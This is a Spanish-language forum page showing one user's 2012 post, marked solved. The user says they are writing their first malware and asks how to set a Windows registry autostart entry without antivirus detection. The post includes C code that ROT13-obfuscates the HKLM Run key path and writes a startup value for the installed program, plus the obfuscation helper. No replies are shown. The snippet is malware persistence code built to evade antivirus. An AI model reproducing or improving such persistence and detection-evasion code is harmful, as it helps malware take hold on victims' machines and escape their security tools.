Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - dlqlplb

Páginas: [1]
1
Dudas y pedidos generales / [SOLUCIONADO] Duda entrada en el registro
« en: Junio 28, 2012, 09:25:48 pm »
Estoy empezando a programar mi primer malware, y me he topado con un detalle al momento de escribir en el registro de windows, estoy usando una funcion muy vieja  que encontre y es por eso que el antivirus me lo detecta muy rapido.
 quisiera saber que metodos o formas de escribir en el registro puedo usar para no ser detectado ta rapido?
 tengo entendido que se puede usar el cifrado XOR!
Tienen algun ejemplo?

       
Código: C
  1.        HKEY startup;
  2.         char key[256];          
  3.         k(key,"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Eha");
  4.         RegCreateKeyEx(HKEY_LOCAL_MACHINE , key, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &startup, NULL);
  5.         RegSetValueEx(startup, regname, 0, REG_SZ, (BYTE *)installpath, strlen(installpath));          
  6.         RegCloseKey(startup);
  7.      
lib.h
     
Código: C
  1. #define WIN32_LEAN_AND_MEAN
  2. #include <windows.h>
  3. #include <string.h>
  4.  
  5.  
  6. char k1(char c);
  7. void k(char *buf, const char *in);
  8.  
  9. char *xstrchr(const char *str, char ch);
  10.  
  11.  
  12. char k1(char c)
  13. {
  14. char u[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
  15. char l[] = "abcdefghijklmnopqrstuvwxyz";
  16. char *p;
  17.  
  18. if ((p = xstrchr(u, c)) != NULL)
  19. return u[((p-u) + 13) % 26];
  20. else if ((p = xstrchr(l, c)) != NULL)
  21. return l[((p-l) + 13) % 26];
  22. else
  23. return c;
  24. }
  25.  
  26. void k(char *buf, const char *in)
  27. {
  28. while (*in)
  29. *buf++ = k1(*in++);
  30. *buf = 0;
  31. }
  32.  
  33. char *xstrchr(const char *str, char ch)
  34. {
  35. while (*str && *str != ch) str++;
  36. return (*str == ch) ? (char *)str : NULL;
  37. }
  38.  
  39.  
  40.      


c++

Páginas: [1]